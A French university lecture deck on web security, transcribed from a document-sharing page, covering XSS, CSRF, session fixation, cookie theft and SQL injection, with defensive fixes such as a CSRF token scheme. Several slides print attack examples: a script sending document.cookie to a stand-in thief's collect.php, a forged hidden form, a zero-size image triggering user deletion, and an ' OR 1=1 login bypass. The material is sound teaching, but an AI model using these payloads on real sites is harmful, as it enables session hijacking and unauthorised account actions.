Sécurite Web. Xavier Tannier Yann Jacob

Dimension: px
Commencer à balayer dès la page:

Download "Sécurite Web. Xavier Tannier xavier.tannier@limsi.fr. Yann Jacob yann.jacob@lip6.fr"

Transcription

1 Sécurite Web Xavier Tannier Yann Jacob

2 Généralités 80 % des sites contiennent au moins une faille de sécurité 24 familles de failles différentes : on ne présente ici que les plus courantes Le code source n est pas forcément la seule cause : un site web est un mélange complexe de plusieurs applications (base de données, code PHP, JavaScript, fichiers de configuration, configuration réseau, SSL, etc.) 2

3 Généralités réseau Le firewall n autorise que les communications sur certains ports (par exemple, 80 pour HTTP), sur certains paquets ou pour certaines applications mais il faut quand même ouvrir le réseau pour pouvoir communiquer, ce qui reste une source de failles Crypter les transactions par le protocole TLS (anciennement SSL), pour protéger : token de session, mot de passe, cookies, etc. Attaques de type Deny-of-Service (DOS) : prévoir des délais et les seuils, ex. 5 minutes d attente après 3 échecs d identification 3

4 Généralités code Tout code mort, commentaire, fichier inutile, donne des indices sur l architecture du site et sont une source de vulnérabilité Moins on en dit, mieux c est : par exemple il vaut mieux utiliser POST (qui néanmoins ne procure aucune sécurité) que GET qui permet de voir et modifier les paramètres directement dans l URL Toutes les données reçues de l extérieur peuvent être dangereuses et doivent toujours être validées 4

5 XSS : cross site scripting Exemple Formulaire GET qui transmet le paramètre name Résultat de la requête: <html> <title>hello!</title> Coucou Le pirate<br /> Bienvenue chez nous!... </html> (affiche le nom de l utilisateur) 5

6 XSS : cross site scripting Que se passe-t-il si on tape l URL: Résultat: <html> <title>hello!</title> Coucou <script>alert(document.cookie)</script><br> Bienvenue chez nous!... </html> Affiche une fenêtre contenant les cookies de l utilisateur! Une attaque réelle va voler les cookies : om/collect.php?cookie="%2bdocument.cookie)</script> 6

7 XSS : cross site scripting Que se passe-t-il si on utilise POST à la place de GET dans l exemple précédent? A-t-on enfin un site sécurisé? On peut créer une page simulant le formulaire Site attaqué Formulaire envoi de données sécurisées Site pirate Formulaire modifié on peut envoyer les valeurs que l on veut 7

8 XSS : cross site scripting Exemple: <form name="myform" method="post" action="http://www.monsite.com/index.php"> <input type="hidden" name="name" value="<script>window.open("http://www.voldecookie.com/collect.php?co okie="%2bdocument.cookie)</script> "> </form> Envoie une requête HTTP avec les paramètres que l on veut (ici le script qui vole les cookies). Ni GET ni POST n offrent la moindre sécurité. POST ne permet que de rendre l attaque un peu moins triviale. Il faut dans tous les cas vérifier les données reçues. 8

9 Ne pas utiliser javascript (bof ) XSS : solutions Retirer toutes les balises ou les caractères <> Utiliser htmlspecialchars(), strip_tags(), htmlentities() ou HTML Tidy Toujours vérifier les données venant de l utilisateur Si vous attendez un nombre, n'acceptez rien d'autre Si vous voulez du texte, rejetez les balises etc. 9

10 CRSF : cross site request forgeries L administrateur de sitevictime.com visite sitepirate.com contenant l image suivante de taille nulle (donc invisible) <img src="http://www.sitevictime.com/index.php?action=deluser&userid=58" alt="" width="0" height="0" /> La tentative d afficher l image exécute la page indiquée dans le src, avec l identification de l administrateur et supprime un utilisateur à l insu de l administrateur (s'il a gardé sa session ouverte). Il existe des versions encore plus sophistiquées et moins détectables. 10

11 CRSF : solutions Utiliser le referer qui indique la page de provenance et permet de vérifier qu une requête vient depuis de votre site et pas d ailleurs (comme un site pirate). Problème : c est un champ envoyé par le client donc on peut le falsifier facilement Utiliser un système de jeton unique et généré aléatoirement par la page du formulaire, transmis par un champ hidden et $_SESSION, dont on vérifie l existence sur la page cible. Si on ne vient pas de la page du formulaire, ça bloque. 11

12 CRSF : solutions <?php $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $_SESSION['token_time'] = time();?> <form action="delete.php" method="post"> <input type="hidden" name="token" value="<?php echo $token;?>" /> MemberId: <input type="text" name="memberid" /> <input type="submit" value="delete it" /> </form> <?php if ($_POST['token'] == $_SESSION['token'] && time() - $_SESSION['token_time'] <= 300) { // Action valide }?> 12

13 Sessions Les sessions reposent uniquement sur un identifiant : une série de 32 chiffres et lettres aléatoires Transmis soit directement soit dans l URL (en GET) ou un champ hidden (en POST) technique trans-sid -, soit par un cookie Exemple de trans-sid: Voler l identifiant peut permettre de se faire passer pour un autre! 13

14 Sessions Le referer contient l adresse de provenance : un identifiant passé en GET par A peut être récupéré par B en allant d un site A vers un site B. On peut aussi envoyer un utilisateur sur un lien avec un PHPSESSID fixé que l on aura choisi au préalable : L utilisateur utilisera la session 1234 : on peut se faire passer pour lui puisqu on a choisi son PHPSESSID. Ne pas utiliser trans-sid (désactiver dans php.ini). Utiliser session_regenerate_id(). 14

15 Cookies Simple fichier texte sur la machine du client, que l on peut modifier à sa guise. Un cookie peut aussi être volé par diverses méthodes (XSS ). Ne jamais les stocker en clair, surtout les mots de passe. Même un stockage crypté est insuffisant, éviter d y stocker des données sensibles. Utiliser un système de "délogin" qui efface le cookie et un identifiant de session généré aléatoirement et utilisable une seule fois. 15

16 Injection SQL On se connecte en entrant le mot de passe suivant: $password = ' OR 1=1 SELECT uid WHERE name = 'Dupont' AND password = ' $password' SELECT uid WHERE name = 'Dupont' AND password = ' ' OR 1=1 toujours vrai! On peut se connecter comme Dupont sans connaître le password. Solution : mysql_real_escape_string() Échappe les caractères interprétés par SQL. Toujours l utiliser avant de passer un paramètre à une requête SQL. 16

17 Peut-on identifier un utilisateur par l IP? Adresse IP du client Se trouve dans l entête des paquets IP qu il envoie (voir cours réseau). Le client peut forger facilement une entête avec une fausse adresse IP source ou usurper une identité : IP-spoofing. 17

18 Panorama loin d être exhaustif. Conclusion Toujours vérifier les données venant de l extérieur, en qui a priori, on ne peut avoir aucune confiance. 18

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse

Plus en détail

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.

Plus en détail

Sécurité d un site php

Sécurité d un site php Sensibilisation IUT de Fontainebleau 8 juin 2015 1 2 1 2 Enjeux L application manipulent-ils des données fiables? L application interagit-elle avec le bon interlocuteur? Le secret des données échangées

Plus en détail

PHP et MySQL : notions de sécurité

PHP et MySQL : notions de sécurité PHP et MySQL : notions de sécurité Jean-Baptiste.Vioix@u-bourgogne.fr Dans ces quelques lignes des notions de sécurité élémentaires vont être présentées. Elles sont insuffisantes pour toute application

Plus en détail

Sécurité d un site PHP

Sécurité d un site PHP Sécurité d un site PHP Lundi 16 mai 2011 Jean-Ferdinand Susini Les impératifs de sécurité Une application Web est une application distribuée sur Internet => problème de sécurité : Les programmes de l application

Plus en détail

Attaques applicatives

Attaques applicatives Attaques applicatives Attaques applicatives Exploitation d une mauvaise programmation des applications Ne touche pas le serveur lui-même mais son utilisation/ configuration Surtout populaire pour les sites

Plus en détail

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Sommaire : Contenu I. Introduction:... 2 II. Présentation de l atelier :... 2 1) Attaque persistante :... 3 2) Attaque non persistante :...

Plus en détail

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward PHP CLÉS EN MAIN 76 scripts efficaces pour enrichir vos sites web par William Steinmetz et Brian Ward TABLE DES MATIÈRES INTRODUCTION 1 1 TOUT CE QUE VOUS AVEZ TOUJOURS VOULU SAVOIR SUR LES SCRIPTS PHP

Plus en détail

La sécurité pour les développeurs. Christophe Villeneuve @hellosct1

La sécurité pour les développeurs. Christophe Villeneuve @hellosct1 La sécurité pour les développeurs Christophe Villeneuve @hellosct1 Qui... est Christophe Villeneuve? afup lemug.fr mysql mariadb drupal demoscene firefoxos drupagora phptour forumphp solutionlinux demoinparis

Plus en détail

Le langage PHP permet donc de construire des sites web dynamiques, contrairement au langage HTML, qui donnera toujours la même page web.

Le langage PHP permet donc de construire des sites web dynamiques, contrairement au langage HTML, qui donnera toujours la même page web. Document 1 : client et serveur Les ordinateurs sur lesquels sont stockés les sites web sont appelés des serveurs. Ce sont des machines qui sont dédiées à cet effet : elles sont souvent sans écran et sans

Plus en détail

T. HSU Sécurité des programmes PHP

T. HSU Sécurité des programmes PHP Sécurité des programmes PHP T. HSU IUT de LENS, Département informatique November 13, 2012 Part I Introduction à PHP Fonctionnement 1 : Requète PHP 2 : Aller chercher la page MySQL Page PHP Moteur PHP

Plus en détail

Roman Mkrtchian SI5-2012/2013 François Chapuis. Rapport de projet de WASP. Réalisation d'un site web sécurisé

Roman Mkrtchian SI5-2012/2013 François Chapuis. Rapport de projet de WASP. Réalisation d'un site web sécurisé Roman Mkrtchian SI5-2012/2013 François Chapuis Rapport de projet de WASP Réalisation d'un site web sécurisé Introduction Nous avons choisi de coder un blog sécurisé. Nous avons notamment codé nous-mêmes

Plus en détail

Headers, cookies et sessions

Headers, cookies et sessions Headers, cookies et sessions Chargement de fichiers (upload) Entêtes HTTP et redirections Gestion des cookies et des sessions de connexions Authentification Validation des données Programmation avancée

Plus en détail

TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012

TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012 TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012 FORMULAIRE DE CONTACT POUR PORTFOLIO PRINCIPE GENERAL Nous souhaitons réaliser un formulaire de contact comprenant les champs suivants : NOM PRENOM ADRESSE MAIL MESSAGE

Plus en détail

1. Manipulation des formulaires avec PHP. 2. Transmission d'arguments entre pages : méthodes GET et POST. 3. Manipulation du JavaScript avec le PHP.

1. Manipulation des formulaires avec PHP. 2. Transmission d'arguments entre pages : méthodes GET et POST. 3. Manipulation du JavaScript avec le PHP. TP5: LES FORMULAIRES OBJECTIFS : 1. Manipulation des formulaires avec PHP. 2. Transmission d'arguments entre pages : méthodes GET et POST. 3. Manipulation du JavaScript avec le PHP. PARTIE 1: Formulaire

Plus en détail

LES INJECTIONS SQL. Que20. 08 novembre 2015

LES INJECTIONS SQL. Que20. 08 novembre 2015 LES INJECTIONS SQL Que20 08 novembre 2015 Table des matières 1 Introduction 5 2 Qu est-ce qu une injection SQL? 7 3 Premier cas : injection SQL sur une chaîne de caractères 9 3.1 Comment s en protéger?..............................

Plus en détail

Sécurité web client. Magali Contensin. ANF Dev Web ASR Carry-Le-Rouet. 25 octobre 2012

Sécurité web client. Magali Contensin. ANF Dev Web ASR Carry-Le-Rouet. 25 octobre 2012 web client Magali Contensin 25 octobre 2012 ANF Dev Web ASR Carry-Le-Rouet Plan Visibilité du code La vérification des données côté client est insuffisante XSS Usurpation de contenu AJAX Visibilité du

Plus en détail

Accès au serveur SQL. Où ranger les accès au serveur SQL?

Accès au serveur SQL. Où ranger les accès au serveur SQL? 150 requête SQL, cela aura un impact sur un nombre limité de lignes et non plus sur l ensemble des données. MySQL propose une clause originale en SQL : LIMIT. Cette clause est disponible avec les différentes

Plus en détail

Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC. Qui contacter pour commencer la mise en place d une configuration de test?

Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC. Qui contacter pour commencer la mise en place d une configuration de test? Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC Qui contacter pour commencer la mise en place d une configuration de test? CyberMUT Paiement - Paiement CIC Commerce Electronique mailto:centrecom@e-i.com

Plus en détail

Compte rendu de PHP MySQL : création d un formulaire de base de données

Compte rendu de PHP MySQL : création d un formulaire de base de données REVILLION Joris Décembre 2009 3EI Compte rendu de PHP MySQL : création d un formulaire de base de données Objectifs : Le principal objectif de ce cours est de découvrir et de nous familiariser avec le

Plus en détail

Injections SQL Adrien Baborier, créateur de l extension AcyMailing Nicolas Claverie, créateur de l extension HikaShop

Injections SQL Adrien Baborier, créateur de l extension AcyMailing Nicolas Claverie, créateur de l extension HikaShop Comprendre et éviter les failles les plus répandues Injections SQL Adrien Baborier, créateur de l extension AcyMailing Nicolas Claverie, créateur de l extension HikaShop Sommaire 1. Vérifications coté

Plus en détail

OWASP Top Ten 2007 Sommaire exécutif

OWASP Top Ten 2007 Sommaire exécutif OWASP Top Ten 2007 Sommaire exécutif Benoit Guerette, gueb@owasp.org Montreal Chapter Leader 24 février 2009 OWASP Education Project Copyright 2007 The OWASP Foundation Permission is granted to copy, distribute

Plus en détail

Technologies du Web. Web et sécurité. Mastère spécialisé Management et nouvelles technologies, 23 novembre 2009

Technologies du Web. Web et sécurité. Mastère spécialisé Management et nouvelles technologies, 23 novembre 2009 Sécurité côté client Technologies du Web Web et sécurité Pierre Senellart (pierre.senellart@telecom-paristech.fr) Mastère spécialisé Management et nouvelles technologies, 23 novembre 2009 P. Senellart

Plus en détail

Sécurité des systèmes informatiques

Sécurité des systèmes informatiques Sécurité des systèmes informatiques Alex Auvolat, Nissim Zerbib 4 avril 2014 Alex Auvolat, Nissim Zerbib Sécurité des systèmes informatiques 1 / 43 Introduction La sécurité est une chaîne : elle est aussi

Plus en détail

La mémorisation des mots de passe dans les navigateurs web modernes

La mémorisation des mots de passe dans les navigateurs web modernes 1 La mémorisation des mots de passe dans les navigateurs web modernes Didier Chassignol Frédéric Giquel 6 décembre 2005 - Congrès JRES 2 La problématique Multiplication des applications web nécessitant

Plus en détail

GED MARKETING. Page 1 sur 18

GED MARKETING. Page 1 sur 18 GED MARKETING I. Présentation du produit... 2 II. Page principale de l application... 3 L arbre... 3 Le menu... 4 La fenêtre de navigation... 4 III. La recherche de documents... 4 Rechercher tous les documents...

Plus en détail

La sécurisation d applications

La sécurisation d applications Université Toulouse 1 Sciences Sociales 10 mars 2008 Les firewalls ne suffisent plus Mais ont-ils jamais été suffisants? La protection à 100% n existe pas. De plus certains protocoles doivent absolument

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning

Plus en détail

LES FAILLES XSS. Que20. 09 janvier 2016

LES FAILLES XSS. Que20. 09 janvier 2016 LES FAILLES XSS Que20 09 janvier 2016 Table des matières 1 Introduction 5 2 Qu est-ce qu une faille XSS? 7 3 Les XSS : explications 9 4 Injection de code JavaScript 13 5 Des protections pas toujours efficaces

Plus en détail

Systèmes d'informations

Systèmes d'informations Systèmes d'informations C'est un ensemble d'outils pour stocker / gérer / diffuser des informations / des données Le stockage : Bases de données + SGDBR La gestion : Saisie, Mise à jour, Contrôle La diffusion

Plus en détail

CP - NBS System. La sécurité informatique : focus sur les menaces les plus communes et leurs solutions

CP - NBS System. La sécurité informatique : focus sur les menaces les plus communes et leurs solutions La sécurité informatique : focus sur les menaces les plus communes et leurs solutions Nous avons publié en février un article résumant les principaux risques liés au manque de sécurité des sites internet.

Plus en détail

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web»

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» 1 OBJECTIFS DE LA FORMATION RSSI PUBLIC Administrateur Réseau et Système Consultant sécurité Responsable Développement Développeur

Plus en détail

Sécurisation des applications web : retour d'expérience des développeurs de Sympa

Sécurisation des applications web : retour d'expérience des développeurs de Sympa Sécurisation des applications web : retour d'expérience des développeurs de Sympa David Verdin - TutoJ RES 12 : Sécurité des sites web - 4 février 2010 8 février 2010 1 En guise d'intro Le point de vue

Plus en détail

Authentification, droits d'accès et sécurité des applis web

Authentification, droits d'accès et sécurité des applis web Authentification, droits d'accès et sécurité des applis web Identification : savoir qui est l'utilisateur basé sur des nom de login enregistrés : base de données, annuaires, fichiers Authentification :

Plus en détail

Bases de données et Sites Web. Li345

Bases de données et Sites Web. Li345 Bases de données et Sites Web. Li345 Remerciements à: Stéphane Gançarski et Philippe Rigaux. Ces transparents sont fortement inspirés du très bon livre : Pratique de MySQL et PHP, troisième édition Philippe

Plus en détail

1. Avec un script php. 2. En utilisant phpmyadmin

1. Avec un script php. 2. En utilisant phpmyadmin Université Lumière - Lyon 2 Master d Informatique M1 - Année 2006-2007 Programmation Web - TDs n 8 9 : PHP - Mysql L. Tougne (http ://liris.cnrs.fr/laure.tougne), 20/11/06 L objectif de ce TD est d utiliser

Plus en détail

Cet ouvrage a bénéficié des relectures attentives des zcorrecteurs.

Cet ouvrage a bénéficié des relectures attentives des zcorrecteurs. Cet ouvrage a bénéficié des relectures attentives des zcorrecteurs. Sauf mention contraire, le contenu de cet ouvrage est publié sous la licence : Creative Commons BY-NC-SA 2.0 La copie de cet ouvrage

Plus en détail

Rapport de Cryptographie

Rapport de Cryptographie Cryptographie [MIF30] / Année 2008-2009 Rapport de Cryptographie Les Injections SQL Sylvie Tixier & François-Xavier Charlet Page 1 20/05/2009 Sommaire Introduction...3 Définition d une injection SQL...3

Plus en détail

Bases de données (INF225), TELECOM ParisTech. TP PHP & MySQL

Bases de données (INF225), TELECOM ParisTech. TP PHP & MySQL Bases de données (INF225), TELECOM ParisTech TP PHP & MySQL Pierre Senellart (pierre.senellart@telecom-paristech.fr) Bogdan Cautis (bogdan.cautis@telecom-paristech.fr) Ioana Ileana (ioana.ileana@telecom-paristech.fr)

Plus en détail

La sécurité PHP pour la certification

La sécurité PHP pour la certification La sécurité PHP pour la certification La nouvelle version de la certification PHP inclut un bonne dose de sécurité. Si vous voulez vous préparer adéquatement à cet épreuve, voici toutes les notions que

Plus en détail

MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI

MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI Claire Billaud - 3ème année IS MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI Page 1 sur 9 Principe : On veut faire en sorte que le réseau interne

Plus en détail

Upload de fichiers en PHP

Upload de fichiers en PHP Upload de fichiers en PHP par HERAULT Antoine Date de publication : 1er décembre 2006 Dernière mise à jour : 1er décembre 2006 Vous avez envie de permettre aux visiteurs de votre site d'uploader des fichiers

Plus en détail

Sécurité des applications web. Daniel Boteanu

Sécurité des applications web. Daniel Boteanu I F8420: Éléments de Sécurité des applications web Daniel Boteanu Architecture des applications web Client légitime Internet HTTP 浀 HTML Server Web 2 Architecture des applications web Client légitime Internet

Plus en détail

Sécurité PHP. FaillesUpload

Sécurité PHP. FaillesUpload Sécurité PHP FaillesUpload Table des matières Introduction...... 3 L upload de fichiers......... 3 Protections coté client...... 4 Protections coté serveur... 5 1. Vérification du type de contenu......

Plus en détail

Université Bordeaux Segalen Licence 3 MIASHS, semestre 6 (2014/2015)

Université Bordeaux Segalen Licence 3 MIASHS, semestre 6 (2014/2015) Université Bordeaux Segalen Licence 3 MIASHS, semestre 6 (2014/2015) Conception de Sites Web Dynamiques : TD 7 Inscription de membres - Variables de sessions - Formulaires pour insérer des images Version

Plus en détail

Conseils en écriture PHP/MySQL. Magali Contensin

Conseils en écriture PHP/MySQL. Magali Contensin Tuto JRES 2010 Conseils en écriture PHP/MySQL Magali Contensin contensin@ibdml.univ-mrs.fr mrs 1 Plan 1. Filtrer les entrées 2. Protéger les sorties 3. Interdire la mise en cache de données 4. Masquer

Plus en détail

Guides des bonnes pratiques de sécurité informatique pour une STA ( Solution Technique d'accès )

Guides des bonnes pratiques de sécurité informatique pour une STA ( Solution Technique d'accès ) Guides des bonnes pratiques de sécurité informatique pour une STA ( Solution Technique d'accès ) Sommaire 1. Protection de son matériel et de ses données Création d'un utilisateur avec mot de passe compliqué

Plus en détail

\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team

\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team \ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( ) \ / /\ _ / \ / / \/ \/ \/ Team Tutoriel Hacking La faille XSS ------------------------ By H4X0R666 Ce tutoriel portera sur l exploitation de la faille XSS et sur

Plus en détail

Pourquoi utiliser un Framework Sécurité Réutilisation Services Abstractions Pourquoi ne pas en utiliser Framework, CMS, Wiki et consor En choisir un

Pourquoi utiliser un Framework Sécurité Réutilisation Services Abstractions Pourquoi ne pas en utiliser Framework, CMS, Wiki et consor En choisir un Frameworks Développement Web Pourquoi utiliser un Framework Sécurité Réutilisation Services Abstractions Pourquoi ne pas en utiliser Framework, CMS, Wiki et consor En choisir un Laurent Pointal - 27 juin

Plus en détail

Applet, Servlet et JSP : des pages Web en action. Philippe Mabilleau ing.

Applet, Servlet et JSP : des pages Web en action. Philippe Mabilleau ing. Carrefour de l information Applet, Servlet et JSP : des pages Web en action Philippe Mabilleau ing. 5 novembre 2002 Des pages Web en action Le Web Des pages Web interactives Applet : de l action du coté

Plus en détail

Programmation Web. Thierry Hamon

Programmation Web. Thierry Hamon 1/27 Programmation Web Thierry Hamon Bureau H202 - Institut Galilée Tél. : 33 1.48.38.35.53 Bureau 150 LIM&BIO EA 3969 Université Paris 13 - UFR Léonard de Vinci 74, rue Marcel Cachin, F-93017 Bobigny

Plus en détail

Applications orientées données (NSY135)

Applications orientées données (NSY135) Applications orientées données (NSY135) 2 Applications Web Dynamiques Auteurs: Raphaël Fournier-S niehotta et Philippe Rigaux (philippe.rigaux@cnam.fr,fournier@cnam.fr) Département d informatique Conservatoire

Plus en détail

Programmation WEB dynamique PHP

Programmation WEB dynamique PHP Programmation WEB dynamique PHP G. Maurey Master 1-2010 Les présentations Gilles MAUFFREY Bureau 5 Batiment W2 T : 72 61 k : maurey@hec.fr www.hec.fr/maurey PHP Plan de la séance 1 Présentation du cours

Plus en détail

Gérer les formulaires

Gérer les formulaires 195 Chapitre 7 Gérer les formulaires 1. Vue d'ensemble Gérer les formulaires 1.1 Petit rappel sur les formulaires Le formulaire est un outil de base indispensable pour les sites web dynamiques puisqu'il

Plus en détail

Sécurité PHP et MySQL

Sécurité PHP et MySQL Sécurité PHP et MySQL Ce document est extrait du travail de diplôme de M. DIZON dans l état.. Sécurité PHP et MySQL...1 1 Introduction...1 2 Sécurisation des scripts PHP...2 2.1 Introduction...2 2.2 Filtrage

Plus en détail

Vulnérabilités logicielles Injection SQL

Vulnérabilités logicielles Injection SQL MGR850 Hiver 2014 Vulnérabilités logicielles Injection SQL Hakima Ould-Slimane Chargée de cours École de technologie supérieure (ÉTS) Département de génie électrique 1 Plan SQL Injection SQL Injections

Plus en détail

COURS DE PROGRAMMATION DE SITE WEB 3 (Base de données web)

COURS DE PROGRAMMATION DE SITE WEB 3 (Base de données web) COURS DE PROGRAMMATION DE SITE WEB 3 (Base de données web) Chapitre 1 INTRODUCTION À PHP PLAN DU COURS 1.1 Les sites statiques et dynamiques 1.2 Fonctionnement d un site internet 1.3 Les langages du Web

Plus en détail

4D v11 SQL Release 6 (11.6) ADDENDUM

4D v11 SQL Release 6 (11.6) ADDENDUM ADDENDUM Bienvenue dans la release 6 de 4D v11 SQL. Ce document présente les nouveautés et modifications apportées à cette nouvelle version du programme. Augmentation des capacités de chiffrement La release

Plus en détail

Le document décortique une interaction HTML-PHP-SQL puis donne le corrigé pour les exercices 1 à 4.

Le document décortique une interaction HTML-PHP-SQL puis donne le corrigé pour les exercices 1 à 4. Le document décortique une interaction HTML-PHP-SQL puis donne le corrigé pour les exercices 1 à 4. I Affichage du formulaire et envoi de données A gauche le code d'une page HTML et à droite son affichage

Plus en détail

Les sites Internet dynamiques. contact : Patrick VINCENT pvincent@erasme.org

Les sites Internet dynamiques. contact : Patrick VINCENT pvincent@erasme.org Les sites Internet dynamiques contact : Patrick VINCENT pvincent@erasme.org Qu est-ce qu un site Web? ensemble de pages multimédia (texte, images, son, vidéo, ) organisées autour d une page d accueil et

Plus en détail

Le langage php. Serveur http est automatiquement lancé.

Le langage php. Serveur http est automatiquement lancé. Le langage php 1. Introduction aux langages serveurs : Il y a deux modes d exécution d une page HTML : Local : en cliquant sur le fichier, le navigateur Serveur http est automatiquement lancé. Navigateur

Plus en détail

OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques

OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques OSSIR Paris / 14 janvier 2014 Guillaume Lopes Consultant Sécurité Guillaume.Lopes@Intrinsec.com 14 janvier 2014 1 Qui suis-je?

Plus en détail

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif?

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? Revue de code Sécuritéou Test d Intrusion Applicatif Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? http://www.google.fr/#q=sebastien gioria Responsable de la branche Audit S.I

Plus en détail

Technologies Web. Farah Benamara Zitoune Maître de conférences IRIT-UPS benamara@irit.fr

Technologies Web. Farah Benamara Zitoune Maître de conférences IRIT-UPS benamara@irit.fr Technologies Web Farah Benamara Zitoune Maître de conférences IRIT-UPS benamara@irit.fr Plan du cours Cours 1 : Introduction HTML/CSS Cours 2 : Introduction programmation web + javascirpt Cours 3 : Introduction

Plus en détail

Client Distribution : Interne

Client Distribution : Interne Le fichier Vertec.ini Produit : Vertec Version produit : 5.6 Document Version doc : 1 Base de connaissance Publication : Création : 30.04.2012 FAQ Astuces Modification : 30.04.2012 Client Distribution

Plus en détail

C e r t i f i c a t I n f o r m a t i q u e e t I n t e r n e t

C e r t i f i c a t I n f o r m a t i q u e e t I n t e r n e t Certificat Informatique et Internet Internet Historique 1960's : ARPAnet / susa 1970's : X25 / Europe 1981 : La France lance le minitel 1990 : ARPAnet devient Internet 1991 : World Wide Web Hypertexte

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web Rencontres SPIRAL 25/02/03 Vulnérabilités et sécurisation des applications Web Pourquoi les firewalls sont impuissants face à certaines attaques patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com

Plus en détail

Intégration page de paiement

Intégration page de paiement Intégration page de paiement Date Version Commentaires 09/03/2010 1.0 Version initiale 01/06/2010 1.1 Ajout sécurisation des données et modification du format du montant Sommaire Introduction... 3 Solutions...

Plus en détail

Introduction à PHP. Formulaires HTML et PHP, interactions avec le client. monnerat@u-pec.fr. 6 avril 2015. IUT de Fontainebleau. Introduction à PHP

Introduction à PHP. Formulaires HTML et PHP, interactions avec le client. monnerat@u-pec.fr. 6 avril 2015. IUT de Fontainebleau. Introduction à PHP Formulaires HTML et PHP, interactions avec le client IUT de Fontainebleau 6 avril 2015 1 Formlaire et traitement 2 Texte Cases à cocher Listes Upload de fichiers Sommaire Formlaire et traitement 1 Formlaire

Plus en détail

NFA016 : Introduction. Pour naviguer sur le Web, il faut : Naviguer: dialoguer avec un serveur web

NFA016 : Introduction. Pour naviguer sur le Web, il faut : Naviguer: dialoguer avec un serveur web NFA016 : Introduction O. Pons, S. Rosmorduc Conservatoire National des Arts & Métiers Pour naviguer sur le Web, il faut : 1. Une connexion au réseau Réseau Connexion physique (câbles,sans fils, ) à des

Plus en détail

Pages Web dynamiques et bases de données

Pages Web dynamiques et bases de données Cours 2 Pages Web dynamiques et bases de données Une page Web dynamique est générée automatiquement grâce à l exécution d un script (PHP par exemple). C est le résultat de l exécution de ce script (code

Plus en détail

INFO-F-405 Sécurité Informatique Projet 3 : SSL et Threat Modeling

INFO-F-405 Sécurité Informatique Projet 3 : SSL et Threat Modeling INFO-F-405 Sécurité Informatique Projet 3 : SSL et Threat Modeling Gabriel Corvalan Cornejo Gaëtan Podevijn François Santy 13 décembre 2010 1 Modélisation et récolte d information du système 1.1 Information

Plus en détail

TME 1 JAVASCRIPT (2 SEANCES)

TME 1 JAVASCRIPT (2 SEANCES) TME 1 JAVASCRIPT (2 SEANCES) 1. EXERCICES DE BASE Créez des fonctions javascript pour : - faire un jeu «plus petit plus grand» qui tire un nombre au hasard que l utilisateur doit trouver en entrant des

Plus en détail

Aide Utilisateur. Cellpass.fr

Aide Utilisateur. Cellpass.fr Aide Utilisateur Mise en place simple :... 2 Création d une ressource... 2 Installation du module... 5 Test fonction file OK... 7 temps de connexion < 1 seconde(s)... 7 Exemple d'installation PassUp pour

Plus en détail

PHP/MYSQL. Web Dynamique

PHP/MYSQL. Web Dynamique PHP/MYSQL Web Dynamique ENSG Juin 2008 Qui suis-je? Guillaume Gautreau Responsable projets Systèmes d information à l ENPC guillaume@ghusse.com http://www.ghusse.com Ces 6 jours de formation Jour 1 : présentations,

Plus en détail

Denial of Service and Distributed Denial of Service

Denial of Service and Distributed Denial of Service Denial of Service and Distributed Denial of Service Laurence Herbiet Christophe Boniver Benoit Joseph Xavier Seronveaux DoS Rappels Signature de l attaque DDoS Rappels Signature de l attaque Denial of

Plus en détail

Cours HTML/PHP. Cours HTML/PHP. E.Coquery. emmanuel.coquery@liris.cnrs.fr

